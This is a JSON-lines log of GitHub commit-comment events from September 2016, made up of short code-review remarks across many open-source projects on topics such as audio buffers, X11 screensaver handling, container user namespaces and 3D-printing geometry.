{"id":"4562909570","type":"CommitCommentEvent","actor":{"login":"dfcreative"},"repo":{"name":"danigb/audio-loader"},"payload":{"comment":{"id":19021638,"position":14,"line":7,"path":"test/node-test.js","commit_id":"8abb7dfbbeb2d065278687559b32464fa7e28383","created_at":"2016-09-14T16:01:36Z","updated_at":"2016-09-14T16:01:36Z","body":"use `isAudioBuffer(buffer)`, where `isAudioBuffer = require('is-audio-buffer')` here.\r\nAlso node buffers are not instances of `Buffer`, unfortunately, we have to use _is-buffer_ package for that if anything."}},"created_at":"2016-09-14T16:01:36Z"}
{"id":"4562914870","type":"CommitCommentEvent","actor":{"login":"dfcreative"},"repo":{"name":"danigb/audio-loader"},"payload":{"comment":{"id":19021645,"position":21,"line":13,"path":"test/node-test.js","commit_id":"8abb7dfbbeb2d065278687559b32464fa7e28383","created_at":"2016-09-14T16:02:24Z","updated_at":"2016-09-14T16:02:24Z","body":"I also get error of encoder with this example, try `maeclave.wav`, that is larger."}},"created_at":"2016-09-14T16:02:24Z"}
{"id":"4562918638","type":"CommitCommentEvent","actor":{"login":"AlenOsmanagic"},"repo":{"name":"AlenOsmanagic/Zadace"},"payload":{"comment":{"id":19021660,"position":null,"line":null,"path":null,"commit_id":"37a50c70b84aff380d61af72a76693db848050e9","created_at":"2016-09-14T16:02:59Z","updated_at":"2016-09-14T16:02:59Z","body":"Pozdrav Irfane, popravio sam svoj laptop, uspostavio virtuelnu mašinu.\nMeđutim, koristio sam je nekih dvadesetak minuta ( ništa posebno otvorio\nemail, linkove što mi je Babac poslao, s namjerom da uradim zadaću) ali kad\nsam pokrenuo XCode mašina se zamrzla. Ugasim. Upalim i dobijem error sa\nslike koji sam ti poslao. Pokušao sam promjeniti postavke mašine, ne\nuspjeva. I za hdd, i za procesor i za boot. Uglavnom, izgleda da sam opet\nosuđen na ovaj iz hackintosh iz WIP-a do sljedeće sedmice dok mi ne stigne\nMacBook. Ako išta znaš o ovome erroru, pošalji mi da probam riješiti. Hvala.\n\n2016-09-09 7:38 GMT+02:00 Alen Osmanagic <aosmanagic19@gmail.com>:\n\n> Ovaj u WIPu sam koristio zadnje dvije zadaće. Al ga sam ja koristim cini\n> mi se. Jer kad god dodjem on je slobodan. Kazu kao razlog jer je stari\n> Xcode na njemu.\n>\n> Dana 08.09.2016. 23:08, osoba \"irfanG\" <notifications@github.com> je\n> napisala:\n>\n>> kakav ti imas racunar? jel neki hackintosh? mozda da vidis ovaj sto je u\n>> wipu?\n>>\n>> —\n>> You are receiving this because you are subscribed to this thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/AlenOsmanagic/Zadace/commit/37a50c70b84aff380d61af72a76693db848050e9#commitcomment-18953065>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/ATLjicjgmyasLAOnwPVAUsE1uVxC1tafks5qoHlqgaJpZM4J4dIZ>\n>> .\n>>\n>\n"}},"created_at":"2016-09-14T16:02:59Z"}
{"id":"4562924086","type":"CommitCommentEvent","actor":{"login":"michaeldesigaud"},"repo":{"name":"RedFroggy/swagger2-angular2-materialize"},"payload":{"comment":{"id":19021672,"position":null,"line":null,"path":null,"commit_id":"ed3d72fba5a2478d53aa398a9065c6503b398ac3","created_at":"2016-09-14T16:03:50Z","updated_at":"2016-09-14T16:03:50Z","body":"No problem! There's still an issue with the unit test and the build. I'm working on it."}},"created_at":"2016-09-14T16:03:50Z"}
{"id":"4562925245","type":"CommitCommentEvent","actor":{"login":"nguillaumin"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":19021677,"position":19,"line":158,"path":"gfx/common/x11_common.c","commit_id":"05df632bd828d7cac1b4c2ca134e94fbdfabc1ab","created_at":"2016-09-14T16:04:02Z","updated_at":"2016-09-14T16:04:02Z","body":"I think unfortunately there's no way to know if it worked. DBus may be available so the message will be correctly sent, but there's no telling something at the other end pays attention to it..."}},"created_at":"2016-09-14T16:04:02Z"}
{"id":"4562928033","type":"CommitCommentEvent","actor":{"login":"vicb"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19021687,"position":5,"line":59,"path":"modules/@angular/http/src/headers.ts","commit_id":"7f647822bdddaad6a96c4f368a9874ce7ae3775c","created_at":"2016-09-14T16:04:27Z","updated_at":"2016-09-14T16:04:27Z","body":"```\r\nsetHeader('abc', v1)\r\nsetHeader('Abc', v2)\r\n```\r\n\r\nthis would have sent 2 headers before.\r\n\r\nIn what is that a breaking change ? (open an issue if this is a real concern)"}},"created_at":"2016-09-14T16:04:27Z"}
{"id":"4562928935","type":"CommitCommentEvent","actor":{"login":"nguillaumin"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":19021692,"position":118,"line":669,"path":"gfx/common/x11_common.c","commit_id":"05df632bd828d7cac1b4c2ca134e94fbdfabc1ab","created_at":"2016-09-14T16:04:36Z","updated_at":"2016-09-14T16:04:36Z","body":"True, well we need to close the connection in all cases, and uninhibit the screensaver if it was inhibited. Will submit another PR."}},"created_at":"2016-09-14T16:04:36Z"}
{"id":"4562929428","type":"CommitCommentEvent","actor":{"login":"FrankFFFF"},"repo":{"name":"jesec/android_kernel_samsung_universal8890"},"payload":{"comment":{"id":19021694,"position":28,"line":4952,"path":"kernel/sched/fair.c","commit_id":"bfc845e8870e35495e44ca38e8edcef2c0bb2e92","created_at":"2016-09-14T16:04:41Z","updated_at":"2016-09-14T16:04:41Z","body":"I'm backporting CFS from 3.18 to 3.10, and backports the EAS stuff is kinda messy in my case, so..maybe i will just stay with HMP for now. Can't wait to see your final work! ;)"}},"created_at":"2016-09-14T16:04:41Z"}
{"id":"4562932685","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19021702,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T16:05:14Z","updated_at":"2016-09-14T16:05:14Z","body":"You want to do that Shoshone hook and see if that works?"}},"created_at":"2016-09-14T16:05:14Z"}
{"id":"4562935005","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19021705,"position":65,"line":82,"path":"worker/uniter/runner/jujuc/network-get.go","commit_id":"d09bbc1a58423f17a10479f999849dee70240c38","created_at":"2016-09-14T16:05:36Z","updated_at":"2016-09-14T16:05:36Z","body":"I know it's PoC - but we should take of IPv6 too."}},"created_at":"2016-09-14T16:05:36Z"}
{"id":"4562940207","type":"CommitCommentEvent","actor":{"login":"hadess"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":19021719,"position":19,"line":158,"path":"gfx/common/x11_common.c","commit_id":"05df632bd828d7cac1b4c2ca134e94fbdfabc1ab","created_at":"2016-09-14T16:06:18Z","updated_at":"2016-09-14T16:06:18Z","body":"You wouldn't get a cookie if the other end isn't listening..."}},"created_at":"2016-09-14T16:06:18Z"}
{"id":"4562943018","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19021730,"position":null,"line":null,"path":null,"commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T16:06:43Z","updated_at":"2016-09-14T16:06:43Z","body":"I'm gonna chop this commit into several on a new branch... always branching out ^^"}},"created_at":"2016-09-14T16:06:43Z"}
{"id":"4562944219","type":"CommitCommentEvent","actor":{"login":"nguillaumin"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":19021740,"position":19,"line":158,"path":"gfx/common/x11_common.c","commit_id":"05df632bd828d7cac1b4c2ca134e94fbdfabc1ab","created_at":"2016-09-14T16:06:54Z","updated_at":"2016-09-14T16:06:54Z","body":"Ah I see, makes sense."}},"created_at":"2016-09-14T16:06:54Z"}
{"id":"4562946731","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19021748,"position":10,"line":75,"path":"src/logger.c","commit_id":"46dfa919154ae29894c0de66ea87a1564c205ba0","created_at":"2016-09-14T16:07:19Z","updated_at":"2016-09-14T16:07:19Z","body":"mode_t is NOT always valid ;)"}},"created_at":"2016-09-14T16:07:19Z"}
{"id":"4562947396","type":"CommitCommentEvent","actor":{"login":"kennetham"},"repo":{"name":"wit-ai/node-wit"},"payload":{"comment":{"id":19021749,"position":218,"line":199,"path":"lib/wit.js","commit_id":"3cd23274e5e22f452371024af4847af62655349a","created_at":"2016-09-14T16:07:26Z","updated_at":"2016-09-14T16:07:26Z","body":"Versions after v4.0.0, serverAccessToken cannot be validated. Throwing out exception.\r\nLatest stable version for validation of tokens is v3.3.2.\r\n\r\nError seem to be similar to #57.\r\n\r\n```log\r\n/Users/node_modules/node-wit/lib/wit.js:200\r\n    throw new Error('Could not find access token, learn more at https://wit.ai/docs');\r\n    ^\r\n\r\nError: Could not find access token, learn more at https://wit.ai/docs\r\n    at validate (/Users/node_modules/node-wit/lib/wit.js:200:11)\r\n    at new Wit (/Users/node_modules/node-wit/lib/wit.js:21:35)\r\n    at Object.<anonymous> (/Users/botController.js:37:13)\r\n    at Module._compile (module.js:556:32)\r\n    at Object.Module._extensions..js (module.js:565:10)\r\n    at Module.load (module.js:473:32)\r\n    at tryModuleLoad (module.js:432:12)\r\n    at Function.Module._load (module.js:424:3)\r\n    at Module.require (module.js:483:17)\r\n    at require (internal/module.js:20:19)\r\n```"}},"created_at":"2016-09-14T16:07:26Z"}
{"id":"4562949167","type":"CommitCommentEvent","actor":{"login":"wking"},"repo":{"name":"opencontainers/runc"},"payload":{"comment":{"id":19021753,"position":26,"line":321,"path":"libcontainer/init_linux.go","commit_id":"5caf3898aedfd6d1a32d25b3849258d8488b9e90","created_at":"2016-09-14T16:07:43Z","updated_at":"2016-09-14T16:07:43Z","body":"On Wed, Sep 14, 2016 at 03:08:22AM -0700, Aleksa Sarai wrote:\n> > Interesting. How do you get grantpt to return an EINVAL based on\n> > user namespace mappings?\n>\n> If `grantpt` tries to use `chown(2)` with an unmapped UID, the\n> kernel will return `EINVAL`. That's how unmapped IDs generally work\n> with syscalls. I haven't checked whether that actually happens, but\n> looking at the code I see no reason why it wouldn't happen.\n\nYup, chown with an unmapped GID will return EINVAL:\n\n  $ strace -fq unshare -Ur chgrp 5 /etc/os-release 2>&1 | grep chown\n  fchownat(AT_FDCWD, \"/etc/os-release\", 4294967295, 5, 0) = -1 EINVAL (Invalid argument)\n\nSo I'll have to revisit why I'm ignoring EPERM in ccon and see if it\nactually makes sense ;).\n"}},"created_at":"2016-09-14T16:07:43Z"}
{"id":"4562954245","type":"CommitCommentEvent","actor":{"login":"MatrixFrog"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19021762,"position":null,"line":null,"path":null,"commit_id":"1f3bc9ae979f3076b06eee2c8f87796ed6fd3607","created_at":"2016-09-14T16:08:29Z","updated_at":"2016-09-14T16:08:29Z","body":"While we do tend to put things in the default externs when they're\nimplemented in \"most\" browsers, and keep them out of the default set\notherwise, we make no promise that because something is in the externs, it\nwill actually work at runtime. If you want to know whether your code works\non browser X you need to test it in browser X.\n"}},"created_at":"2016-09-14T16:08:29Z"}
{"id":"4562958227","type":"CommitCommentEvent","actor":{"login":"joseluizcoe"},"repo":{"name":"kytos/website"},"payload":{"comment":{"id":19021772,"position":null,"line":null,"path":null,"commit_id":"4902ccd1433c7d787fc9caca22e8801e8ca9c1a0","created_at":"2016-09-14T16:09:10Z","updated_at":"2016-09-14T16:09:10Z","body":"Preview (build version):\r\n![kytos-preview](https://cloud.githubusercontent.com/assets/32010/18520007/64c782b8-7a7c-11e6-81d7-c1c502596374.png)\r\n"}},"created_at":"2016-09-14T16:09:10Z"}
{"id":"4562960269","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"mulchy/koa-example"},"payload":{"comment":{"id":19021781,"position":6,"line":6,"path":"app.js","commit_id":"a63105e0f02ebe197807cacdfd7abfaa48947abb","created_at":"2016-09-14T16:09:31Z","updated_at":"2016-09-14T16:09:31Z","body":"Consider removing this console log statement."}},"created_at":"2016-09-14T16:09:31Z"}
{"id":"4562962728","type":"CommitCommentEvent","actor":{"login":"dblock"},"repo":{"name":"aq1018/mongoid-history"},"payload":{"comment":{"id":19021786,"position":null,"line":null,"path":null,"commit_id":"75c200fba411530047c1c23a750aff05f93ac836","created_at":"2016-09-14T16:09:55Z","updated_at":"2016-09-14T16:09:55Z","body":"@aq1018 Done. Deleted mine."}},"created_at":"2016-09-14T16:09:55Z"}
{"id":"4562967400","type":"CommitCommentEvent","actor":{"login":"Aminoid"},"repo":{"name":"Aminoid/Python_Utilities"},"payload":{"comment":{"id":19021792,"position":null,"line":null,"path":null,"commit_id":"298477aa7cf019ed598f6ada000267ed335355c4","created_at":"2016-09-14T16:10:40Z","updated_at":"2016-09-14T16:10:40Z","body":"Initial commits"}},"created_at":"2016-09-14T16:10:40Z"}
{"id":"4562968635","type":"CommitCommentEvent","actor":{"login":"tom-district"},"repo":{"name":"theganyo/swagger-node-runner"},"payload":{"comment":{"id":19021794,"position":null,"line":null,"path":null,"commit_id":"a23b1bb19dffc94c892f558b339b97c500e6a79c","created_at":"2016-09-14T16:10:53Z","updated_at":"2016-09-14T16:10:53Z","body":"`lenght` is not spelled correctly "}},"created_at":"2016-09-14T16:10:53Z"}
{"id":"4562969448","type":"CommitCommentEvent","actor":{"login":"cztomczak"},"repo":{"name":"allestuetsmerweh/garden.cefpython"},"payload":{"comment":{"id":19021795,"position":78,"line":448,"path":"cefbrowser/cefbrowser.py","commit_id":"cba169e3bd085cc8350ce0dfa26eddcf76150c0e","created_at":"2016-09-14T16:11:01Z","updated_at":"2016-09-14T16:11:01Z","body":"Mouse move event is not sent during html5 dragging, looks like an error to me. It might work, but expect the unexpected."}},"created_at":"2016-09-14T16:11:01Z"}
{"id":"4562971728","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19021802,"position":3,"line":30,"path":"src/SkirtBrim.cpp","commit_id":"dc97b5f312b3537976d048269d191ddefecfe5ec","created_at":"2016-09-14T16:11:26Z","updated_at":"2016-09-14T16:11:26Z","body":"Maybe a bit, theres still support removed to place brim there..."}},"created_at":"2016-09-14T16:11:26Z"}
{"id":"4562978175","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19021815,"position":36,"line":148,"path":"src/game/AI/AggressorAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T16:12:31Z","updated_at":"2016-09-14T16:12:31Z","body":"Oh yeah, I actually made sure that these are not done in the overlaying functions."}},"created_at":"2016-09-14T16:12:31Z"}
{"id":"4562979243","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19021819,"position":3,"line":30,"path":"src/SkirtBrim.cpp","commit_id":"dc97b5f312b3537976d048269d191ddefecfe5ec","created_at":"2016-09-14T16:12:42Z","updated_at":"2016-09-14T16:12:42Z","body":"fixed"}},"created_at":"2016-09-14T16:12:42Z"}
{"id":"4562980882","type":"CommitCommentEvent","actor":{"login":"WetRobot"},"repo":{"name":"WetRobot/popEpi"},"payload":{"comment":{"id":19021822,"position":null,"line":null,"path":null,"commit_id":"46260bd3aa9632cb7c1e9025aa27fc13360306ad","created_at":"2016-09-14T16:12:58Z","updated_at":"2016-09-14T16:12:58Z","body":"Looks like last two pushes failed testing!\r\n\r\nhttps://travis-ci.org/WetRobot/popEpi/builds\r\n\r\n"}},"created_at":"2016-09-14T16:12:58Z"}
{"id":"4562981907","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19021824,"position":null,"line":null,"path":null,"commit_id":"331d15ace950a1de583ae47482a2672f4f1205c4","created_at":"2016-09-14T16:13:09Z","updated_at":"2016-09-14T16:13:09Z","body":"Initial commit"}},"created_at":"2016-09-14T16:13:09Z"}
{"id":"4562982398","type":"CommitCommentEvent","actor":{"login":"yatanadam"},"repo":{"name":"Hearst-DD/ObjectMapper"},"payload":{"comment":{"id":19021825,"position":null,"line":null,"path":null,"commit_id":"ddf2c721a9f6b63d4bfa97c1065c31d5fa8548d5","created_at":"2016-09-14T16:13:14Z","updated_at":"2016-09-14T16:13:14Z","body":"How to use it in podfile?\r\n"}},"created_at":"2016-09-14T16:13:14Z"}
{"id":"4562985663","type":"CommitCommentEvent","actor":{"login":"jiayeerawr"},"repo":{"name":"jiayeerawr/addressbook-level3"},"payload":{"comment":{"id":19021830,"position":null,"line":null,"path":null,"commit_id":"10e8ea04ecd9aae186442c86de2ab17bc2156478","created_at":"2016-09-14T16:13:45Z","updated_at":"2016-09-14T16:13:45Z","body":"![sora](https://cloud.githubusercontent.com/assets/14961285/18520154/395463b4-7ad9-11e6-9efe-412171166018.PNG)\r\n"}},"created_at":"2016-09-14T16:13:45Z"}
{"id":"4562986160","type":"CommitCommentEvent","actor":{"login":"miguelao"},"repo":{"name":"WICG/shape-detection-api"},"payload":{"comment":{"id":19021832,"position":null,"line":null,"path":null,"commit_id":"c8030a75ad1926e740efa866629886283226c1af","created_at":"2016-09-14T16:13:50Z","updated_at":"2016-09-14T16:13:50Z","body":"Re. #12 "}},"created_at":"2016-09-14T16:13:50Z"}
{"id":"4562987443","type":"CommitCommentEvent","actor":{"login":"kohenkatz"},"repo":{"name":"nwjs/nw.js"},"payload":{"comment":{"id":19021837,"position":5,"line":29,"path":"README.md","commit_id":"9307669dd12008fbc183dc29d9d787a20c36d157","created_at":"2016-09-14T16:14:02Z","updated_at":"2016-09-14T16:14:02Z","body":"Maybe this URL should be https://nwjs.io/blog/v0.17.2/ ?"}},"created_at":"2016-09-14T16:14:02Z"}
{"id":"4562987727","type":"CommitCommentEvent","actor":{"login":"jiayeerawr"},"repo":{"name":"jiayeerawr/addressbook-level3"},"payload":{"comment":{"id":19021840,"position":null,"line":null,"path":null,"commit_id":"10e8ea04ecd9aae186442c86de2ab17bc2156478","created_at":"2016-09-14T16:14:07Z","updated_at":"2016-09-14T16:14:07Z","body":"WARNING: Non-responsive design"}},"created_at":"2016-09-14T16:14:07Z"}
{"id":"4563005966","type":"CommitCommentEvent","actor":{"login":"georgiana-b"},"repo":{"name":"georgiana-b/api"},"payload":{"comment":{"id":19021877,"position":39,"line":39,"path":"migrations/20160912132241_create_risks_of_bias.js","commit_id":"90c8c6f9ff5365fa71f9da8c320a729c5d8c9169","created_at":"2016-09-14T16:17:09Z","updated_at":"2016-09-14T16:17:09Z","body":"I think it might be confusing because `unknown` is an actual value given by the reviewers and `null` expresses that there was no value. If I make it nullable and it's a `null`, we won't know which is the case."}},"created_at":"2016-09-14T16:17:09Z"}
{"id":"4563006766","type":"CommitCommentEvent","actor":{"login":"tghaas"},"repo":{"name":"polleverywhere/FOMObot-hipchat"},"payload":{"comment":{"id":19021880,"position":null,"line":null,"path":null,"commit_id":"a592d930ddc3e47f6782c7d1149be436620601fb","created_at":"2016-09-14T16:17:17Z","updated_at":"2016-09-14T16:17:17Z","body":"I've updated it to be more generic."}},"created_at":"2016-09-14T16:17:17Z"}
{"id":"4563007459","type":"CommitCommentEvent","actor":{"login":"coreyderosa"},"repo":{"name":"coreyderosa/ITVSTest"},"payload":{"comment":{"id":19021882,"position":null,"line":null,"path":null,"commit_id":"b410309f683feb2c61f8c5013bb3672924de79aa","created_at":"2016-09-14T16:17:25Z","updated_at":"2016-09-14T16:17:25Z","body":"Test failed...clone function is disabled in my IT VS"}},"created_at":"2016-09-14T16:17:25Z"}
{"id":"4563012096","type":"CommitCommentEvent","actor":{"login":"apmuthu"},"repo":{"name":"UberGallery/UberGallery"},"payload":{"comment":{"id":19021889,"position":null,"line":null,"path":null,"commit_id":"d017420f80be7c3383b1c2609d05851c5e438abc","created_at":"2016-09-14T16:18:13Z","updated_at":"2016-09-14T16:18:13Z","body":"There is one more such fix needed in this file."}},"created_at":"2016-09-14T16:18:13Z"}
{"id":"4563017305","type":"CommitCommentEvent","actor":{"login":"samontea"},"repo":{"name":"allenh1/YaSh"},"payload":{"comment":{"id":19021899,"position":null,"line":null,"path":null,"commit_id":"b40b3711d3d2aff5e7433f96723b28a5bf17763f","created_at":"2016-09-14T16:19:07Z","updated_at":"2016-09-14T16:19:07Z","body":"❗ "}},"created_at":"2016-09-14T16:19:07Z"}
{"id":"4563023107","type":"CommitCommentEvent","actor":{"login":"lml0035"},"repo":{"name":"lml0035/practice1"},"payload":{"comment":{"id":19021917,"position":null,"line":null,"path":null,"commit_id":"c096367337d150ff8b459143754a34e4937207b7","created_at":"2016-09-14T16:20:11Z","updated_at":"2016-09-14T16:20:11Z","body":"I am attempting to learn _GitHub_ using some of the tricks I learned from the **Markdown** tutorial."}},"created_at":"2016-09-14T16:20:11Z"}
{"id":"4563028118","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19021924,"position":4,"line":336,"path":"openstudiocore/src/utilities/CMakeLists.txt","commit_id":"0e6d0249556fae9afef428dc1c0822388c29d780","created_at":"2016-09-14T16:21:00Z","updated_at":"2016-09-14T16:21:00Z","body":"well we could just stick it in our source tree and skip the download, that is fine by me.  is that what you meant?  the problem was not predicting where it will be it was making sure it will exist before this command is called."}},"created_at":"2016-09-14T16:21:00Z"}
{"id":"4563028526","type":"CommitCommentEvent","actor":{"login":"smarter"},"repo":{"name":"felixmulder/dotty"},"payload":{"comment":{"id":19021926,"position":null,"line":null,"path":null,"commit_id":"ccc4b1921ad1e3145258f3b3aa2ca2ac3262aabe","created_at":"2016-09-14T16:21:04Z","updated_at":"2016-09-14T16:21:04Z","body":"Love the idea! If you want to be even more ambitious, Rust is now experimenting with detailed explanations which actually include examples from your own code, see section \"Extended error messages\" of https://blog.rust-lang.org/2016/08/10/Shape-of-errors-to-come.html"}},"created_at":"2016-09-14T16:21:04Z"}
{"id":"4563030390","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19021930,"position":19,"line":227,"path":"src/utils/linearAlg2D.h","commit_id":"09a3ec4790ebfcb0ac6b9e377c4a178745b9b04f","created_at":"2016-09-14T16:21:23Z","updated_at":"2016-09-14T16:21:23Z","body":"It's an inline function. It *has* to be in the header file.\r\n\r\npointLiesOnTheRightOfLine is a bit of a weird function. I can't really put my finger on it.\r\nMaybe it's more robust to rounding errors, or maybe its checking whether a point actually lies to the right as in has a higher X.\r\n\r\nWe could add it to the Point class, but then it wouldn't be as accassible, given that the naming of this function is very much to the point of how it is used.\r\nI don't feel like adding the perpdot to the Point class and redirecting this function to that one..."}},"created_at":"2016-09-14T16:21:23Z"}
{"id":"4563030571","type":"CommitCommentEvent","actor":{"login":"TRox1972"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19021931,"position":50,"line":73,"path":"youtube_dl/extractor/go.py","commit_id":"014b7e6b25be5583c772af054cd7a1e37a327088","created_at":"2016-09-14T16:21:24Z","updated_at":"2016-09-14T16:21:24Z","body":"spelling mistake?"}},"created_at":"2016-09-14T16:21:24Z"}
{"id":"4563031174","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19021934,"position":null,"line":null,"path":null,"commit_id":"e57c7c521e8243a554c9cc96f79ea14b374c536d","created_at":"2016-09-14T16:21:30Z","updated_at":"2016-09-14T16:21:30Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1004](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13286&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-14T16:21:30Z"}
{"id":"4563032348","type":"CommitCommentEvent","actor":{"login":"AngelZatch"},"repo":{"name":"AngelZatch/Salsabor"},"payload":{"comment":{"id":19021941,"position":null,"line":null,"path":null,"commit_id":"c92d7250b7b3be362623928663969376c3c98cf8","created_at":"2016-09-14T16:21:42Z","updated_at":"2016-09-14T16:21:42Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;wEFPEFq8&#x2F;380-activation-automatique-des-adhesions-annuelles\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Activation automatique des adhésions annuelles</a>"}},"created_at":"2016-09-14T16:21:42Z"}
{"id":"4563033281","type":"CommitCommentEvent","actor":{"login":"AngelZatch"},"repo":{"name":"AngelZatch/Salsabor"},"payload":{"comment":{"id":19021946,"position":null,"line":null,"path":null,"commit_id":"87f6e38990fd8ba47c0cfce940f581065fdf6824","created_at":"2016-09-14T16:21:52Z","updated_at":"2016-09-14T16:21:52Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;8GS7EJ8Q&#x2F;381-notifications-en-cas-de-validation-des-modifications-d-informations\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Notifications en cas de validation des modifications d&#39;informations</a>"}},"created_at":"2016-09-14T16:21:52Z"}
{"id":"4563033402","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19021947,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T16:21:54Z","updated_at":"2016-09-14T16:21:54Z","body":"Yeah, let's do that."}},"created_at":"2016-09-14T16:21:54Z"}
{"id":"4563034985","type":"CommitCommentEvent","actor":{"login":"AngelZatch"},"repo":{"name":"AngelZatch/Salsabor"},"payload":{"comment":{"id":19021955,"position":null,"line":null,"path":null,"commit_id":"c92d7250b7b3be362623928663969376c3c98cf8","created_at":"2016-09-14T16:22:12Z","updated_at":"2016-09-14T16:22:12Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;h9pTJ54n&#x2F;382-archivages-des-participations-irregulieres-trop-vieilles\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Archivages des participations irrégulières trop vieilles</a>"}},"created_at":"2016-09-14T16:22:12Z"}
{"id":"4563035092","type":"CommitCommentEvent","actor":{"login":"cyberblast"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19021956,"position":null,"line":null,"path":null,"commit_id":"8e0bb60f371489e6792d0cc5a2949cf825a8eb05","created_at":"2016-09-14T16:22:13Z","updated_at":"2016-09-14T16:22:13Z","body":"#160"}},"created_at":"2016-09-14T16:22:13Z"}
{"id":"4563035914","type":"CommitCommentEvent","actor":{"login":"AngelZatch"},"repo":{"name":"AngelZatch/Salsabor"},"payload":{"comment":{"id":19021957,"position":null,"line":null,"path":null,"commit_id":"300989e145d0857b720d6c01c8e06e49255df4d2","created_at":"2016-09-14T16:22:22Z","updated_at":"2016-09-14T16:22:22Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;wEFPEFq8&#x2F;380-activation-automatique-des-adhesions-annuelles\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Activation automatique des adhésions annuelles</a>"}},"created_at":"2016-09-14T16:22:22Z"}
{"id":"4563036619","type":"CommitCommentEvent","actor":{"login":"AngelZatch"},"repo":{"name":"AngelZatch/Salsabor"},"payload":{"comment":{"id":19021958,"position":null,"line":null,"path":null,"commit_id":"f04ca50e8172c0f2c43ed242b874cf928fb9704f","created_at":"2016-09-14T16:22:28Z","updated_at":"2016-09-14T16:22:28Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;IDjaILfm&#x2F;383-assouplissement-de-la-logique-des-participations\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Assouplissement de la logique des participations</a>"}},"created_at":"2016-09-14T16:22:28Z"}
{"id":"4563039299","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19021965,"position":18,"line":284,"path":"tests/utils/LinearAlg2DTest.cpp","commit_id":"09a3ec4790ebfcb0ac6b9e377c4a178745b9b04f","created_at":"2016-09-14T16:22:57Z","updated_at":"2016-09-14T16:22:57Z","body":"That's true..."}},"created_at":"2016-09-14T16:22:57Z"}
{"id":"4563039754","type":"CommitCommentEvent","actor":{"login":"simogasp"},"repo":{"name":"poparteu/openMVG"},"payload":{"comment":{"id":19021966,"position":null,"line":null,"path":null,"commit_id":"50364757e47d24ebfde1ff3302efdb18473aaf7a","created_at":"2016-09-14T16:23:02Z","updated_at":"2016-09-14T16:23:02Z","body":"@fabiencastan this is the only difference with popart_develop and we already have this. I think the branch can be safely deleted"}},"created_at":"2016-09-14T16:23:02Z"}
{"id":"4563043342","type":"CommitCommentEvent","actor":{"login":"wicked-smart"},"repo":{"name":"wicked-smart/hello-world"},"payload":{"comment":{"id":19021970,"position":null,"line":null,"path":null,"commit_id":"c31c4cfe0898ebe94252b4c41b0886403637fd0d","created_at":"2016-09-14T16:23:41Z","updated_at":"2016-09-14T16:23:41Z","body":"good job"}},"created_at":"2016-09-14T16:23:41Z"}
